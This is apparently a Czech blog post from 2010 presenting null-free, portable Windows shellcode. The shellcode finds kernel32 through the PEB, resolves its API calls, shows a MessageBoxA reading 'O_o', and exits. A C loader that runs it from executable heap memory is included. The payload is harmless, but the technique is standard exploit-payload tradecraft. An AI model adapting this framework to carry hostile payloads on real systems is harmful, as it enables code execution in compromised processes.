Přenositelný (portable) shellcode, který vyvolá MessageBoxA s textem „O_o“ a regulérně se ukončí pomocí ExitProcess. Shellcode neobsahuje NULL byty. Využívá PEB strukturu k nalezení kernel32.dll v paměti procesu. Kód byl úspěšně testován na:
Win XP SP2 ENG
Win XP SP2 CZ
Win XP SP3 CZ
Win Vista (32bit)/(64bit)
Win 2000
Win 2003
Win 7 (32bit)/(64bit)
Win 2k8 (32bit)


Na Win7 a některých verzích Win2k se objevily problémy s nalezením kernel32.dll pomocí struktury PEB. Tuto nedokonalost plánuji odstranit.
Edit: 11. červen 2010 V konceptu návrhu shellcodu byla chyba, kterou jsem odhalil až nyní. Proto sem dávám opravenou (a snad již 100% fungující) verzi. Dále byla odstraněna nedokonalost v podobě problému s nalezením kernel32.dll pomocí struktury PEB na některých verzích Win2k a Win7, takže v současnosti by měl shellcode pracovat na všech verzích Windows.
http://www.exploit-db.com
http://shell-storm.org
http://inj3ct0r.com

Velikost: 238 bajtů.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#include <stdio.h>
#include <windows.h>
 
int main(){
  unsigned char shellcode[]=
  "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
  "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
  "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
  "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
  "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
  "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
  "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
  "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
  "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
  "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
  "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
  "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
  "\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
  "\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
  "\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
  "\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
  "\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
  "\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
  "\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
  "\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
  "\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
  "\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
  "\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
  "\x40\xFF\x54\x24\x40\x57\xFF\xD0";
 
  LPVOID lpAlloc;
  void (*opcode)();
 
  printf("Size = %d\n", lstrlen(shellcode));
  system("PAUSE");
 
  lpAlloc = VirtualAlloc(0, 4096,
              MEM_COMMIT,
              PAGE_EXECUTE_READWRITE);
 
  if(lpAlloc == NULL){
    printf("Memory not allocated!\n");
    return 0;
  }
 
  memcpy(lpAlloc, shellcode, sizeof(shellcode));
 
  opcode = lpAlloc;
 
  opcode();
 
  return 0;
}